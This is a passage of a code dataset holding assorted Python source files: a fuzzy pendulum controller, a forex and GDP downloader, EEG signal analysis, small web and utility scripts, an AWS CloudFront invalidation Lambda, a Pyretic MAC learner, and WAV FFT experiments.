linear_vel < 3:\n positive_xd = (1/3) * linear_vel\n else:\n positive_xd = 1\n\n #inclination & ang. vel.\n NL_iav = [0]\n NM_iav = [0]\n NS_iav = [0]\n Z_iav = [0]\n PS_iav = [0]\n PM_iav =[0]\n PL_iav = [0]\n #position & lin. veloc.\n NL_plv = [0]\n NM_plv = [0]\n NS_plv = [0]\n Z_plv = [0]\n PS_plv = [0]\n PM_plv = [0]\n PL_plv = [0]\n # -------------------------------------------------------------\n # Output membership determination - pendulum rules\n # -------------------------------------------------------------\n # Pendulum rule # 1\n NL_iav.append(min(negative_th, negative_thd))\n # Pendulum rule # 2\n NM_iav.append(min(negative_th, zero_thd))\n # Pendulum rule # 3\n Z_iav.append(min(negative_th, positive_thd))\n # Pendulum rule # 4\n NS_iav.append(min(zero_th, negative_thd))\n # Pendulum rule # 5\n Z_iav.append(min(zero_th, zero_thd))\n # Pendulum rule # 6\n PS_iav.append(min(zero_th, positive_thd))\n # Pendulum rule # 7\n Z_iav.append(min(positive_th, negative_thd))\n # Pendulum rule # 8\n PM_iav.append(min(positive_th, zero_thd))\n # Pendulum rule # 9\n PL_iav.append(min(positive_th, positive_thd))\n\n # -------------------------------------------------------------\n # Output membership determination - CAR rules\n # -------------------------------------------------------------\n # CAR rule # 1\n NL_plv.append(min(negative_x, negative_xd))\n # CAR rule # 2\n NM_plv.append(min(negative_x, zero_xd))\n # CAR rule # 3\n Z_plv.append(min(negative_x, positive_xd))\n # CAR rule # 4\n NS_plv.append(min(zero_x, negative_xd))\n # CAR rule # 5\n Z_plv.append(min(zero_x, zero_xd))\n # CAR rule # 6\n PS_plv.append(min(zero_x, positive_xd))\n # CAR rule # 7\n Z_plv.append(min(positive_x, negative_xd))\n # CAR rule # 8\n PM_plv.append(min(positive_x, zero_xd))\n # CAR rule # 9\n PL_plv.append(min(positive_x, positive_xd))\n\n # Determination of the force applied to the car 1 // inclination and ang. 
velocity//-19/+19\n num_iav = max(NL_iav)*-120 + max(NM_iav)*-60 + max(NS_iav)*-6 + max(Z_iav)*0 + max(PS_iav)*6 + max(PM_iav)*60 + max(PL_iav)*120\n den_iav = max(NL_iav)+max(NM_iav)+max(NS_iav)+max(Z_iav)+max(PS_iav)+max(PM_iav)+max(PL_iav)\n\n # Determination of the force applied to the car (position + linear vel)\n num_plv = max(NL_plv)*-80 + max(NM_plv)*-17 + max(NS_plv)*-5 + max(Z_plv)*0 + max(PS_plv)*5 + max(PM_plv)*17 + max(PL_plv)*80\n den_plv = max(NL_plv)+max(NM_plv)+max(NS_plv)+max(Z_plv)+max(PS_plv)+max(PM_plv)+max(PL_plv)\n\n iav = num_iav / den_iav\n plv = num_plv / den_plv\n resp = (iav+plv)\n\n return resp\n","repo_name":"HandreMelo/EngComputacao","sub_path":"IA/Fuzzy/fuzzyContro.py","file_name":"fuzzyContro.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"34682521354","text":"import datetime as dt\nimport pandas_datareader.data as web\nfrom pandas_datareader import wb\nimport os\n\ntickers = ['USD=X',\n 'EUR=X',\n 'CNY=X',\n 'JPY=X',\n 'GBP=X',\n 'INR=X',\n 'BRL=X',\n 'CAD=X',\n 'RUB=X',\n 'AUD=X',\n 'MXN=X',\n 'IDR=X',\n 'TRY=X',\n 'CHF=X',\n 'SAR=X',\n 'ARS=X',\n 'SEK=X',\n 'THB=X',\n 'NGN=X',\n 'IRR=X']\n\nsuccessfulTickers = []\n\ncountries = ['US',\n 'EU',\n 'CN',\n 'JP',\n 'GB',\n 'IN',\n 'BR',\n 'CA',\n 'RU',\n 'AU',\n 'MX',\n 'ID',\n 'TR',\n 'CH',\n 'SA',\n 'AR',\n 'SE',\n 'TH',\n 'NG',\n 'IR']\n\nsuccessfulCountries = []\n\ndef getForexData(startDate, endDate, ticker):\n df = web.DataReader(ticker, 'yahoo', startDate, endDate);\n return df['Adj Close']\n\ndef getGDPData(startYear, endYear, country):\n df = wb.download(indicator='NY.GDP.MKTP.KD', country=[country], start=startYear, end=endYear)\n return df\n\nprint(\"Enter the currency code (eg. 
SGD)\")\ncurrencyCode = input();\n\nif not os.path.exists(currencyCode + \"_data\"):\n os.makedirs(currencyCode + \"_data\")\n \nif not os.path.exists(\"shared_gdp_data\"):\n os.makedirs(\"shared_gdp_data\")\n\nfor i in range(0, len(tickers)):\n \n tickers[i] = currencyCode + tickers[i];\n \n try:\n dfForex = getForexData(dt.datetime(2003, 12, 1), dt.datetime(2017, 10, 23), tickers[i]);\n dfForex.to_csv(currencyCode + \"_data\\\\\" + countries[i] + \".csv\");\n \n dfGdp = getGDPData(2003, 2016, countries[i])\n dfGdp.to_csv(\"shared_gdp_data\\\\\" + countries[i] + \".csv\");\n \n except Exception: \n print(tickers[i]);\n ","repo_name":"zbz-lvlv/currency_index","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37928060026","text":"import mne\nimport numpy as np\nfrom scipy.integrate import simps\nfrom numpy import loadtxt\nimport h5py\nimport time\nimport os \nimport matplotlib.pyplot as plt\nimport pickle\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.metrics import confusion_matrix, make_scorer, accuracy_score, precision_score, recall_score, f1_score, classification_report\nimport pandas as pd\nimport tensorflow as tf\nfrom scipy import signal\nfrom scipy.signal import butter, lfilter, periodogram, spectrogram, welch, filtfilt, iirnotch\nfrom scipy.stats import pearsonr, spearmanr\nimport matplotlib.mlab as mlab\nimport pandas as pd\nfrom SigQual import SigQual\n\n#%% Initiate an object from SigQual class\nObject = SigQual()\n\n#%% Read in data (Somno + Zmax)\n\n#####=========================== Reading data ============================#####\n\n# Main path\nmain_path = \"F:/Zmax_Data/features/\"\n\n# Read location of Somno data\nsubj_ids_somno = Object.read_txt(main_path = main_path, file_name = \"SigQual_Somno_data_loc\",\\\n dtype = 'str',delimiter='\\n') \n \n# Read Zmax data\nsubj_ids_zmax = Object.read_txt(main_path = main_path, file_name = \"SigQual_Zmax_data_loc\",\\\n dtype = 'str',delimiter='\\n') \n\n\n# Read subject_night id\nsubj_night = Object.read_txt(main_path = main_path, file_name = \"Subject_Night\",\\\n dtype = 'str',delimiter='\\n') \n\n# read event markers path to sync data\nsync_markers_main_path = \"F:/Zmax_Data/features/\"\nevent_markers = Object.read_excel(main_path = sync_markers_main_path, filename = \"Sync_periods\")\n\n\n#%% initializing dictionaries to save output\nSxx_somno_dic = dict()\nSxx_zmax_dic = dict()\nf_spect_somno_dic = dict()\nf_spect_zmax_dic = dict()\npsd_somno_dic = dict()\npsd_zmax_dic = dict()\nf_psd_somno_dic = dict()\nf_psd_zmax_dic = dict()\n\n#%% Main loop of analysis\n#####======================== Iterating through subjs=====================#####\nfor idx, c_subj in enumerate(subj_ids_somno):\n\n # define the current zmax data\n curr_zmax = subj_ids_zmax[idx]\n \n # define current somno data\n curr_somno = c_subj\n \n # Reading EEG left and right (Zmax)\n data_L = Object.read_edf_file(path_folder=curr_zmax, filename=\"EEG L\", preload = True)\n data_R = Object.read_edf_file(path_folder=curr_zmax, filename=\"EEG R\", preload = True) \n \n # Read somno data \n EEG_somno =Object.read_edf_file(path_folder=curr_somno, filename=\"\", preload = True) \n \n # Reading info header (Somno)\n Info_s, fs_somno, AvailableChannels_s = Object.edf_info(EEG_somno)\n \n # Reading info header (Zmax)\n Info_z, fs_zmax, 
AvailableChannels_z = Object.edf_info(data_R)\n \n # ======================= Data representation =========================== #\n \n# =============================================================================\n# Object.plot_edf(data = data_R, higpass = .1, lowpass = 30, duration = 30, n_channels =1)\n# Object.plot_edf(data = data_L, higpass = .1, lowpass = 30, duration = 30, n_channels =1)\n# Object.plot_edf(data = EEG_somno, higpass = .1, lowpass = 30, duration = 30, n_channels =4)\n# =============================================================================\n \n # ======================= Filter data before resample =================== #\n #Data_R_filt = Object.mne_obj_filter(data = data_R, sfreq = fs_zmax, l_freq = .1, h_freq=30, picks = AvailableChannels_z)\n \n # ======================= Resampling to lower freq ====================== #\n \n fs_res, data_R, EEG_somno = Object.resample_data(data_R, EEG_somno, fs_zmax, fs_somno)\n _ , data_L, _ = Object.resample_data(data_L, EEG_somno, fs_zmax, fs_somno)\n\n # ========================== Get data arrays ============================ #\n data_L_get = data_L.get_data()\n data_R_get = data_R.get_data()\n data_somno_get = EEG_somno.get_data()\n \n # ====================== Filtering resampled data ======================= #\n \n data_L_resampled_filtered = Object.butter_bandpass_filter(data_L_get, lowcut=.1, highcut=30, fs=fs_res, order = 2)\n data_R_resampled_filtered = Object.butter_bandpass_filter(data_R_get, lowcut=.1, highcut=30, fs=fs_res, order = 2)\n EEG_somno_resampled_filtered = Object.butter_bandpass_filter(data_somno_get, lowcut=.1, highcut=30, fs=fs_res, order = 2)\n\n # ====================== Synchronization of data ======================== #\n \n # required inputs to sync\n LRLR_start_zmax = event_markers['LRLR_start_zmax'][idx] #sec\n LRLR_end_zmax = event_markers['LRLR_end_zmax'][idx] #sec\n LRLR_start_somno = event_markers['LRLR_start_somno'][idx] #sec\n LRLR_end_somno = event_markers['LRLR_end_somno'][idx] #sec\n \n # sync\n lag, corr, Somno_reqChannel, zmax_data_R = Object.sync_data(fs_res, LRLR_start_zmax, LRLR_end_zmax, LRLR_start_somno, LRLR_end_somno,\\\n data_R_resampled_filtered, data_L_resampled_filtered, \\\n EEG_somno_resampled_filtered, AvailableChannels_s, save_name = subj_night[idx], \\\n RequiredChannels = ['F4:A1'], save_fig = False, dpi = 1000,\\\n save_dir = \"F:/Zmax_Data/Results/SignalQualityAnalysis/\",\n report_pearson_corr_during_sync = True,\\\n report_spearman_corr_during_sync = True,\\\n plot_cross_corr_lag = True)\n \n # ======================= Plot full sig after sync ====================== #\n \n full_sig_somno_before_sync = Somno_reqChannel\n full_sig_zmax_before_sync = zmax_data_R\n Object.plot_full_sig_after_sync(LRLR_start_somno, LRLR_start_zmax, fs_res,\n lag, full_sig_somno_before_sync,\n full_sig_zmax_before_sync)\n ","repo_name":"MahdadJafarzadeh/ssccoorriinngg","sub_path":"Quality analysis/SignalQualityAnalyzer.py","file_name":"SignalQualityAnalyzer.py","file_ext":"py","file_size_in_byte":5872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38040510158","text":"import cv2 as cv\n\nimg = cv.imread('demo.jpg')\ncv.imshow('normal', img)\n\nresize_img = cv.resize(img, [200,200])\ncv.imshow('resize', resize_img)\n\ncropped_img = img[100:200, 200: 350]\ncv.imshow('croped', 
cropped_img)\n\ncv.waitKey(0)","repo_name":"harry10-git/OpenCV-FCC","sub_path":"week2/resize_crop.py","file_name":"resize_crop.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8088481830","text":"import torch\nimport re\nimport numpy as np\n\ndef convert_to_unicode(text):\n    \"\"\"Converts `text` to Unicode (if it's not already), assuming utf-8 input.\"\"\"\n    if isinstance(text, str):\n        return text\n    elif isinstance(text, bytes):\n        return text.decode(\"utf-8\", \"ignore\")\n    else:\n        raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n\ndef count_parameters(model):\n    return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\ndef rouge(hyp, ref, n):\n    scores = []\n    for h, r in zip(hyp, ref):\n        r = re.sub(r'\[UNK\]', '', r)\n        r = re.sub(r'[’!\"#$%&\\'()*+,-./::?!《》;<=>?@[\\\\]^_`{|}~]+', '', r)\n        r = re.sub(r'\d', '', r)\n        r = re.sub(r'[a-zA-Z]', '', r)\n        count = 0\n        match = 0\n        for i in range(len(r) - n + 1):\n            gram = r[i:i + n]\n            if gram in h:\n                match += 1\n            count += 1\n        scores.append(match / count if count else 0.0)\n    return np.average(scores)\n\nif __name__ == \"__main__\":\n    hyp = ['交大闵行校区一实验室发生硫化氢泄漏事故中无学生伤亡', '[UNK]史上最严的环保法[UNK]']\n    ref = ['上海交大闵行校区:实验室换瓶时硫化氢泄漏送货员身亡', '#2015全国两会#傅莹:[UNK]史上最严[UNK]环保法是[UNK]有牙齿[UNK]的']\n    print(rouge(hyp, ref, 2))\n\n    ","repo_name":"kururuken/BERT-Transformer-for-Summarization","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"61"} +{"seq_id":"72951320833","text":"#!/usr/bin/env python3\n\nfrom logic.menu import Menu\nfrom logic.coffee_maker import CoffeeMaker\nfrom logic.money_machine import MoneyMachine\n\ncoffe_maker = CoffeeMaker()\ncharge = MoneyMachine()\nmenu = Menu()\n\nnot_stop = True\nwhile not_stop:\n    request = input(f\"Please select one of the items: {menu.get_items()}: \").lower()\n    if request == \"report\":\n        coffe_maker.report()\n        charge.report()\n    elif request == \"off\":\n        print(\"Entering maintenance mode. The machine will turn off\")\n        not_stop = False\n    else:\n        info_request = menu.find_drink(request)\n        if coffe_maker.is_resource_sufficient(info_request):\n            if charge.make_payment(info_request.cost):\n                charge.money_received += info_request.cost\n                coffe_maker.make_coffee(info_request)\n","repo_name":"gabrielvictorio/PythonBootcamp","sub_path":"terminal_coffee_machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72273716354","text":"\nfrom __future__ import print_function\n\n# 배포 무효화(invalidation) 처리 \n# 2022. 06. 
25 C.W.Jung \n\nimport boto3\nimport time\n\ndef lambda_handler(event, context):\n \n for items in event[\"Records\"]:\n path = \"/\" + items[\"s3\"][\"object\"][\"key\"]\n print(path)\n \n client = boto3.client('cloudfront')\n \n # CloudFront ID : EDTWAAAXXABIM \n # S3 Web Origin : ex) data.mydomain.com ( 용도 : Front Web )\n # CloudFront CNAME : ex) cdn.mydomain.com \n \n invalidation = client.create_invalidation(DistributionId='EDTWAAAXXABIM',\n InvalidationBatch={\n 'Paths': {\n 'Quantity': 1,\n 'Items': [path]\n },\n 'CallerReference': str(time.time())\n})\n","repo_name":"GaussJung/apistart","sub_path":"reference/lambda/invalidate_cdn_python/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36838214593","text":"\nfrom pyretic.lib.corelib import *\nfrom pyretic.lib.std import *\nfrom pyretic.kinetic.util.resetting_q import *\n\nfrom pyretic.kinetic.fsm_policy import *\nfrom pyretic.kinetic.drivers.json_event import JSONEvent\nfrom pyretic.kinetic.smv.model_checker import *\n\n\n#####################################################################################################\n# * App launch\n# - pyretic.py pyretic.kinetic.apps.mac_learner\n#\n# * Mininet Generation (in \"~/pyretic/pyretic/kinetic\" directory)\n# - sudo mininet.sh --topo=clique,3,3\n#\n# * Start ping from h1 to h2 \n# - mininet> h1 ping h2\n#\n# * Events are internal\n# - Mac Learner application will automatically react to \n# topology change (e.g., link down and up) emulated from Mininet, and successfully\n# forward traffic until no route exists between two hosts.\n#####################################################################################################\n\n\nclass mac_learner(DynamicPolicy):\n def __init__(self):\n max_port = 8\n port_range = range(max_port+1)\n def int_to_policy(i):\n return flood() if i==0 else fwd(i)\n pol_range = map(int_to_policy,port_range)\n\n ### DEFINE THE LPEC FUNCTION\n\n def lpec(f):\n return match(dstmac=f['dstmac'],\n switch=f['switch'])\n\n ## SET UP TRANSITION FUNCTIONS\n\n @transition\n def topo_change(self):\n self.case(occurred(self.event),self.event)\n self.default(C(False))\n\n @transition\n def port(self):\n self.case(occurred(self.event) & (V('port')==C(0)),self.event)\n self.case(is_true(V('topo_change')),C(0))\n\n @transition\n def policy(self):\n for i in port_range:\n self.case(V('port')==C(i),C(int_to_policy(i)))\n\n ### SET UP THE FSM DESCRIPTION\n\n self.fsm_def = FSMDef(\n topo_change=FSMVar(type=BoolType(),\n init=False,\n trans=topo_change),\n port=FSMVar(type=Type(int,set(port_range)),\n init=0,\n trans=port),\n policy=FSMVar(type=Type(Policy,set(pol_range)),\n init=flood(),\n trans=policy))\n\n ### DEFINE QUERY CALLBACKS\n\n def q_callback(pkt):\n host = pkt['srcmac']\n switch = pkt['switch']\n port = pkt['inport']\n flow = frozendict(dstmac=host,switch=switch)\n return fsm_pol.event_handler(Event('port',port,flow))\n\n ### SET UP POLICY AND EVENT STREAMS\n\n fsm_pol = FSMPolicy(lpec,self.fsm_def)\n rq = resetting_q(query.packets,limit=1,group_by=['srcmac','switch'])\n rq.register_callback(q_callback)\n\n super(mac_learner,self).__init__(fsm_pol + rq)\n\n\ndef main():\n pol = mac_learner()\n\n # For NuSMV\n smv_str = fsm_def_to_smv_model(pol.fsm_def)\n mc = ModelChecker(smv_str,'mac_learner') \n\n ## Add specs\n mc.add_spec(\"FAIRNESS\\n topo_change;\")\n mc.add_spec(\"SPEC AG (port=0 -> AG EF 
port>0)\")\n mc.add_spec(\"SPEC ! AG A [ port>0 U topo_change ]\")\n mc.add_spec(\"SPEC AG (port>0 -> A [ port>0 U topo_change ] )\")\n mc.add_spec(\"SPEC AG (port=1 -> A [ port=1 U topo_change ] )\")\n mc.add_spec(\"SPEC ! AG (port=2 -> A [ port=1 U topo_change ] )\")\n mc.add_spec(\"SPEC ! AG (port=1 -> EX port=2)\")\n mc.add_spec(\"SPEC AG (port=1 -> EF port=2)\")\n mc.add_spec(\"SPEC AG (port=1 -> A [ !(port=2) U port=0 ])\")\n mc.add_spec(\"SPEC AG (port=1 -> A [ !(port=2) U topo_change ])\")\n\n mc.save_as_smv_file()\n import datetime as dt\n n1=dt.datetime.now()\n mc.verify()\n n2=dt.datetime.now()\n\n print (n2-n1).microseconds\n\n return pol\n","repo_name":"littlepretty/Coursera-SDN-Assignments","sub_path":"ProgrammingAssignments/gardenwall_assignment_8/KineticAppExample/mac_learner.py","file_name":"mac_learner.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"7114693822","text":"# 1834\n\n# 와 시간초과 뜨는줄...\n# 식 짧게 만드는 것도 가능한가보다\n\nimport sys\n\nn = int(sys.stdin.readline())\nssum = 0\n\nfor i in range(1, n):\n ssum += i*(n+1)\n\nprint(ssum)\n","repo_name":"soohyeon21/study","sub_path":"BaekJoon/beginner/9_b1_1834.py","file_name":"9_b1_1834.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23414103281","text":"import sys\nimport logging\n\ndef magicIO(inName, outName): #this reads the guesses and cards\n\t#open file\n\tfin = open(inName)\n\tT = int(fin.readline())\n\tfout = open(outName,'w')\n\n\t#looping cases\n\tfor testcase in range(0,T):\n\t\tlogging.debug(\"Case #\" + str(testcase+1) + \":\")\n\t\t\n\t\t#reading flie\n\t\tans1 = int(fin.readline())\n\t\tfor row in range(0,ans1-1): #looping dump rows\n\t\t\tfin.readline()\n\t\trow1 = map(int, fin.readline().split()) #read row\n\t\tfor row in range(0, 4-ans1): #looping dump rows\n\t\t\tfin.readline()\n\t\tlogging.debug(\">> Row\" + str(ans1) + \": \" + str(row1))\n\n\t\tans2 = int(fin.readline())\n\t\tfor row in range(0,ans2-1): #looping dump rows\n\t\t\tfin.readline()\n\t\trow2 = map(int, fin.readline().split()) #read row\n\t\tfor row in range(0, 4-ans2): #looping dump rows\n\t\t\tfin.readline()\n\t\tlogging.debug(\">> Row\" + str(ans2) + \": \" + str(row2))\n\t\t\n\t\t#guess cases and output\n\t\tguess = magicTrick(row1, row2)\n\t\tresult= \"Case #\" + str(testcase+1) + \": \"\n\t\tif len(guess) == 1:\n\t\t\tresult = result + str(guess[0])\n\t\telif len(guess) > 1:\n\t\t\tresult = result + \"Bad magician!\"\n\t\telse:\n\t\t\tresult = result + \"Volunteer cheated!\"\n\t\tlogging.info(result)\n\t\tfout.write(result+\"\\n\")\n\n\t#done and closing\n\tfout.close()\n\tfin.close()\n\n\n\n\ndef magicTrick(row1, row2):\n\tresult = filter(lambda x: x in row1, row2)\n\treturn result\t\n\n\n\nif __name__ == '__main__':\n\tlogger = logging.getLogger()\n\tlogger.setLevel(logging.DEBUG)\n\n\tinName = \"example.in\"\n\toutName = \"output\"\n\tif len(sys.argv) == 2:\n\t\tinName = sys.argv[1]\n\telif len(sys.argv) > 2:\n\t\tlogging.error(\" Usage: solution.py filename\")\n\t\tsys.exit(0)\n\tlogging.info( \"Running MagicTrick: \" + inName + \" > \" + outName)\n\tmagicIO(inName, 
outName)\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/2550.py","file_name":"2550.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33892446705","text":"from aiohttp import web\n\n\nasync def handle(request):\n name = request.match_info.get(\"name\", \"Anonymous\")\n return web.json_response({\"name\": name})\n\n\napp = web.Application()\napp.add_routes([web.get(\"/{name}\", handle)])\n\n\ndef run():\n web.run_app(app)\n","repo_name":"dyens/aiohttp-vs-fastapi","sub_path":"aiohttp_vs_fastapi/aiohttp/simple_response.py","file_name":"simple_response.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17354087365","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n30/01/2018\r\n\r\ncd \\d_Development\\Python\\Scripts\\kata\\Kata_04_WavFileFFT\r\n\r\n@author: johnm\r\n\"\"\"\r\n\r\n\r\n#%%\r\n\r\nimport numpy as np\r\nimport scipy.io.wavfile as wv\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.fftpack import fft\r\n\r\n\r\n#%%\r\n\r\n# - Read the wav file into numpy array 'w'.\r\nfs, w = wv.read('LovetFaller.wav')\r\n\r\n# - Convert to a float.\r\nw = w.astype('float64')\r\n\r\n# - Show the number of channels, in some way.\r\nif len(w.shape) == 1:\r\n print(\"Number of Channels: 1\")\r\nelse:\r\n print(\"Number of Channels: {0}\".format(w.shape[1]))\r\n\r\n# - If more than one channel, convert to mono using a mean.\r\nif len(w.shape) == 2:\r\n w = w.mean(axis=1)\r\n\r\n# - Normalise on [-1.0, 1.0].\r\nw = w - np.mean(w)\r\nw /= max(abs(w))\r\n\r\n# - Visualise the data, using an appropriate step.\r\nplt.plot(w[::10])\r\n\r\n# - Choose a start point and time period to analyse\r\n# (JoMo: Consider the power of two thing.)\r\nt = 10.0\r\ndt = 0.25\r\n\r\nN = int(dt * fs)\r\nN = N - N % 2\r\nNN = int(N / 2)\r\n\r\nprint(\"N: {0}\".format(N))\r\n\r\n# - Display that period\r\n\r\n\r\n#%%\r\n# Check for drop-outs.\r\n\r\nnstep = 100\r\n\r\nplt.plot(w[::nstep])\r\n\r\nn = 4\r\nfig, axs = plt.subplots(n, 1, sharex=True, figsize=(8,2*n))\r\nfig.subplots_adjust(hspace=0)\r\n\r\nq = int(w.shape[0] / n)\r\n\r\nfor i in range(n):\r\n axs[i].plot(w[i*q:(i+1)*q:nstep])\r\n axs[i].set_yticks([])\r\n\r\nplt.show()\r\n\r\ndel i, n, nstep, q\r\ndel axs, fig\r\n\r\n\r\n#%%\r\n# Fourier trasform of a specific slice of time.\r\n\r\nt = 16.0\r\ndt = 0.25\r\n\r\nN = int(dt * f)\r\nN = N - N % 2\r\nNN = int(N / 2)\r\n\r\nws = w[int(t*f):int(t*f)+N]\r\nws -= np.mean(ws)\r\nws /= max(abs(ws))\r\n\r\nyf = fft(ws)\r\nyf = np.abs(yf)\r\nyf = yf[:NN]\r\nyf /= NN # JoMo: Check this\r\n\r\nxf = np.linspace(0.0, f/2, NN)\r\n\r\nmaxf = 2000\r\n\r\nn = int(maxf * N / f)\r\n\r\nxf = xf[:n]\r\nyf = yf[:n]\r\n\r\n#plt.plot(xf[:n], yf[:n])\r\nplt.plot(xf, yf)\r\n#plt.ylim(0, 0.1)\r\n\r\n\r\n#%%\r\n#\r\n# Recreate the sounds, in chunks\r\n#\r\n\r\ndt = 0.25\r\ntstart = 15.0\r\ntend = 30.0\r\n\r\n#dt = 0.01\r\n#tstart = 53.0\r\n#tend = 63.0\r\n\r\nthresh = 0.1\r\n\r\nmaxf = 2000\r\n\r\nN = int(dt * f)\r\nN = N - N % 2\r\nNN = int(N / 2)\r\n\r\nn = int(maxf * N / f)\r\n\r\nxf = np.linspace(0.0, f/2, NN)\r\nxf = xf[:n]\r\n\r\ntseg = np.linspace(0, dt, N)\r\n\r\nenv = np.sin(np.linspace(0, np.pi, N))\r\n\r\nwr = np.array([])\r\n\r\n# Smoothing envelope\r\n# Type 1\r\nenv = np.sin(np.linspace(0, np.pi, N)) ** 1\r\n# Type 2\r\n#frac = 10\r\n#env = np.zeros(N) + 1.0\r\n#env[:int(N/frac)] = 
np.linspace(0, 1, int(N/frac))\r\n#env[-int(N/frac):] = np.linspace(1, 0, int(N/frac))\r\n#env = env**0.1\r\n\r\n#fdict = {}\r\n\r\nfor t in np.arange(tstart, tend, dt):\r\n\r\n print(t)\r\n\r\n # Use the normalised data.\r\n ws = wn[int(t*f):int(t*f)+N]\r\n \r\n yf = fft(ws)\r\n yf = np.abs(yf)\r\n yf = yf[:NN]\r\n yf /= NN\r\n \r\n yf = yf[:n]\r\n \r\n threshold = thresh * max(yf) # Bear in mind that this will vary between segments\r\n\r\n q = zip(xf[yf >= threshold], yf[yf >= threshold])\r\n #fdict[t] = (threshold, len(yf[yf >= threshold]), q)\r\n\r\n wseg = np.zeros(N)\r\n for freq, weight in q:\r\n wseg += weight * np.sin(2 * np.pi * freq * tseg)\r\n wseg *= env\r\n\r\n wr = np.append(wr, wseg, axis=0)\r\n\r\nwr = wr / abs(wr).max()\r\nwr = (32000 * wr).astype('int16')\r\n\r\n# Tidy this...\r\nwx = wn[int(tstart*f):int(tstart*f)+wr.shape[0]]\r\nwx = wx / abs(wx).max()\r\nwx = (32000 * wx).astype('int16')\r\n\r\nwmix = np.vstack((wr, wx)).T\r\n\r\nwv.write('zz_recreated.wav', f, wr)\r\nwv.write('zz_recreated_cmp.wav', f, wmix)\r\n\r\n\r\n#%%\r\n#\r\n#\r\n#\r\n\r\ndt = 0.25\r\n\r\nN = int(dt * f)\r\nN = N - N % 2\r\nNN = int(N / 2)\r\n\r\nxf = np.linspace(0.0, f/2, NN)\r\n\r\nmaxf = 2000\r\nn = int(maxf * N / f)\r\n\r\nnchart = 21\r\n\r\nfig, axs = plt.subplots(nchart, 1, sharex=True)\r\nfig.subplots_adjust(hspace=0.35)\r\n\r\nfig.set_figheight(2 * nchart)\r\nfig.set_figwidth(10)\r\n\r\ni = 0\r\nfor t in np.linspace(15, 20, nchart):\r\n\r\n ws = w[int(t*f):int(t*f)+N]\r\n ws -= np.mean(ws)\r\n ws /= max(abs(ws))\r\n\r\n yf = fft(ws)\r\n yf = np.abs(yf)\r\n yf = yf[:NN]\r\n yf /= NN # JoMo: Check this\r\n\r\n axs[i].plot(xf[:n], yf[:n])\r\n #axs[i].bar(range(q.shape[1]), q[i], 0.99)\r\n #axs[i].set_yticks([0, np.ceil(np.max(yf[:n]))])\r\n #axs[i].set_yticks([])\r\n #axs[i].set_ylim(0, 1)\r\n axs[i].set_title(\"t={0:.2f}\".format(t))\r\n \r\n i += 1\r\n\r\nplt.show()\r\n\r\n\r\n#%%\r\n#\r\n# Problems\r\n# 1) This fails if more than one item has the maximum value.\r\n# See the example in the next cell.\r\n# 2) The sum of the mid-point an neighbouring points is \r\n# incorrect if di=1 and there are peaks at i and i+2, \r\n# because the values at point i+1 is shared twice, between\r\n# the two points.\r\n#\r\n\r\nyq = np.zeros(n)\r\nyr = np.zeros(n)\r\n\r\nm = 1.5\r\ndi = 1\r\n\r\nfor i in range(di, n-di):\r\n if yf[i] == max(yf[i-di:i+di+1]):\r\n #yq[i] = yf[i]\r\n yq[i] = sum(yf[i-1:i+2])\r\n\r\nfor i in range(di, n-di):\r\n if yf[i] == max(yf[i-di:i+di+1]):\r\n if yf[i] > m * np.mean(yf[i-di:i+di+1]):\r\n #yr[i] = yf[i]\r\n yr[i] = sum(yf[i-1:i+2])\r\n\r\nsq = 0\r\nnq = 110\r\n\r\nplt.bar(range(nq), yf[sq:sq+nq])\r\n#plt.xticks(xf[sq:sq+nq])\r\nplt.show()\r\nplt.bar(range(nq), yq[sq:sq+nq])\r\nplt.show()\r\nplt.bar(range(nq), yr[sq:sq+nq])\r\nplt.show()\r\n\r\n\r\n#%%\r\n\r\nst = 2**(1/12) - 1\r\n\r\nprint(\" Amp\\t Semi\\t f\\t 2f\\t 3f\\t 4f\")\r\nprint(\"-----\\t-----\\t-----\\t-----\\t-----\\t-----\")\r\n\r\n# Why round the numbers if they are then displayed to a \r\n# certain number of decimal places?\r\n# Am I planning to look for integer multiples?\r\n\r\nfor i in range(len(yr)):\r\n if yr[i] > 0:\r\n print(\"{0:5.0f}\\t{1:5.0f}\\t{2:5.0f}\\t{3:5.0f}\\t{4:5.0f}\\t{5:5.0f}\".format(\r\n round(1000*yr[i], 0), \r\n round(st * xf[i], 0),\r\n round(1 * xf[i], 0),\r\n round(2 * xf[i], 0),\r\n round(3 * xf[i], 0),\r\n round(4 * xf[i], 0)\r\n ))\r\n\r\ndel st\r\n\r\n\r\n#%%\r\n\r\n# Keep this example - it shows it failing.\r\nyf = 